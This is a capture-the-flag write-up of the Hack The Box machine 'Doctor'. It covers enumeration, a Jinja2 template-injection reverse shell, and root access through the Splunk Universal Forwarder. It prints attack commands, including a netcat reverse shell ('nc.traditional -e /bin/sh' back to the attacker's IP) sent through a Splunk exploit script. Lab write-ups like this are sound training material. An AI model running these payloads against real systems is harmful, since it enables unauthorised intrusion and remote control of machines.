Hack The Box — Doctor
Introduction
Hello there! Thank you for taking the time to read my write-up for Doctor, the recently retired machine from Hack The Box. Doctor is an Easy Linux machine that requires careful enumeration to gain a foothold. The foothold is achieved through a Server-Side Template Injection (SSTI) vulnerability that allows a reverse shell payload to be executed. This system is also running a vulnerable version of Splunk which will allow us to execute commands on the box as root.
What will be covered
• Nmap
• Gobuster
• Server-Side Template Injection
• Privilege Escalation via Splunk Forwarder
With that out of the way, lets jump right in !
Scanning
For the scanning phase we will use Nmap to discover open ports, and services that are running on the box and output them in the Nmap format for later use. For this test, we will be scanning all 65536 TCP ports in order to discover everything that is running on the system, and that is reachable from the Internet. In order to accomplish this, I ran the following command:
sudo nmap -sC -sV -T4 -p- -oN nmap/doctor.nmap 10.129.80.153
As shown in the screenshot above, the system has ports 22 (SSH), 80 (HTTP), and 8089 (Splunkd) exposed to the Internet. Based on the output produced by Nmap, we can assume that the system is running an Ubuntu Linux operating system.
Web Application
A general starting point for any CTF challenge is to check out what is running on the web server and go from there. Browsing to the homepage of the server reveals a website that is titled Doctor. The first thing I will do is inspect the source code and see if there is anything hidden or interesting in there. The source code reveals to us a new hostname on the server doctors.htb. I added this find to my /etc/hosts file in order to force DNS resolution to the machine’s assigned IP address. This addition brings us to the Doctor Secure Messaging portal login page.
We have the ability to create an account and login to the website. There isn’t very much that is given right away when exploring the site, other than the ability to create and post messages. My initial thought was to try SQL Injection in order to dump some credentials or even potentially gain a shell that way. After a while of poking around I decided to move on. I was playing around with different things and Googling potential vulnerabilities that could be present in web applications. I found something that was very interesting when looking through the source code.
As shown by the screenshot above, the message postings are being reflected in the source code! A quick Google search leads me to believe there is potentially a Server Side Template Injection Vulnerability. My next stop was to https://github.com/swisskyrepo/PayloadsAllTheThings to look through some cheat sheets. I used the Server-Side Template Injection cheat sheet that later proved to be very useful.
Server-Side Template Injection
Since I had never come across a vulnerability of this nature, this flowchart made it surprisingly easy.
I repeated the process of following the flow chart and checking the source code. I wasn’t really seeing the results that I would have expected, so I decided to move on (for now).
Gobuster
In the process of poking at the website to test for vulnerabilities, I completely forgot to have my scans running in the background. I felt like I hit a dead end on the SSTI and thought I had missed something. The first thing I do in situations like this when dealing with web applications is to check and see if there are any interesting directories that can be discovered on the server. My go-to tool of choice is Gobuster. There are countless tools out there that perform directory brute-forcing, but this one seems to suit my needs the best. I ran the following command, and received the following output:
sudo gobuster dir -u http://doctors.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster/doctors.out
The first that jumps out is the /archive directory with a status code of 200! Since I already knew about the other directories, this was my very next stop. Browsing to http://doctors.htb/archive brings up a blank page. Naturally, I checked the source code and received a pleasant surprise!
Server-Side Template Injection (Revisited)
Referring back to the flowchart, I picked up where I left off.
I was able to make the determination, based on my findings, that the server was either running Jinja2 or Twig. I referred back to the PayloadsAllTheThings cheat sheet and started with Jinja2 since that was the first one I came to.
At this point, I have identified that the sever is running Jinja2 as a template engine, and that it is also vulnerable to SSTI. Now, its time to try and leverage this vulnerability to gain shell access on the system.
Foothold
This is where things got interesting! There is Remote Code Execution payload on the PayloadsAllTheThings cheatsheet that I have been using through out this process. The payload that is shown in the given example reads a flag.txt. Since I am looking to gain shell access, I modified this payload to execute a Python 3 reverse shell. I set up a Netcat listener on port 4445 and executed the reverse shell.
In order to get the reverse shell to execute, I needed to go back to http://doctors.htb/archive and refresh the page. I received a connection back on my listener! The first thing I will do is upgrade the shell in order to make enumeration of the box easier.
Post-Exploitation
One of the first things I do when working through a Hack The Box machine is to see who has a home directory. Generally speaking, this is where the user.txt is located. Changing to the /home directory, I find that my current user (web) has a home directory as well as a new user Shaun. I find that I am able to access Shaun’s home directory, but do not have access to the user.txt file.
The next thing I do is automate the enumeration process by using Carlos Polop’s Privilege-Escalation-Awesome-Scripts-Suite. I uploaded linpeas.sh via wget to the /tmp directory. I set up a Python 3 web server in order to pull down the file.
Linpeas.sh is an awesome (says so in the name) tool for automating enumeration tasks. It will display potential privilege escalation paths in a color coded manner. There is also a Windows version available (winpeas.exe) which makes life so much easier when dealing with Windows-based systems. Running ./linpeas.sh will start the scrip and will automatically start collecting useful information.
One useful feature of the PEAS lineup is that searches for password strings. Users commonly make mistakes when performing simple tasks (like putting a password in an email field). As shown in the screenshot above, there is a perfect example of that exact situation. The password-like string Guitar123 was mistakenly entered in an email field for a password reset form. Since there Shaun is a valid user on the box, I will try switching to that user using the gathered credentials and see if the password is valid.
user.txt
I am able to switch to the Shaun using the password that was found and grab the user.txt flag.
From here, we are looking to escalate to the root user on the box and complete the challenge.
root.txt
During the initial scanning phase, Nmap revealed port 8089 (Splunkd) exposed to the Internet. Some light research brought an article to my attention. This article details how the Splunk Universal Forwarder Agent can be leveraged by an authenticated user to remotely execute commands on a system. Some more Googling led me to a GitHub repository that had proof of concept code for this exact vulnerability. I have linked both below for reference:
After reviewing the PoC code, I was able to determine that I should be able to utilize it to execute commands remotely on the system. The first thing I wanted to do is verify that I could reach back to my local system. I used the following command to verify that I had remote code execution:
python3 splunkwhisper.py — host 10.129.2.21 — port 8089 — username shaun — password “Guitar123” — payload “ping -c3 10.10.14.29” — lhost 10.10.14.29
As shown in the screenshot below, I was able to collect the ICMP traffic through the use of Tcpdump.
Now that I have verified RCE, it is time to try and get a shell! This part took me a lot of trial and error to get figured out, but in the end I was able to gain a root shell. I used the following command in order to escalate my privileges to the root user:
python3 splunkwhisper.py — host 10.129.2.21 — port 8089 — lhost 10.10.14.29 — username shaun — password Guitar123 — payload “nc.traditional -e /bin/sh 10.10.14.29 9000”
As shown in the screenshot below, I successfully obtained root. The ultimate goal of the challenge is to collect the root.txt flag. With the root shell, I am able to access root.txt and complete the challenge!
If you have made it this far, I appreciate you taking the time to read this write up. Thank you for reading, and stay tuned for more!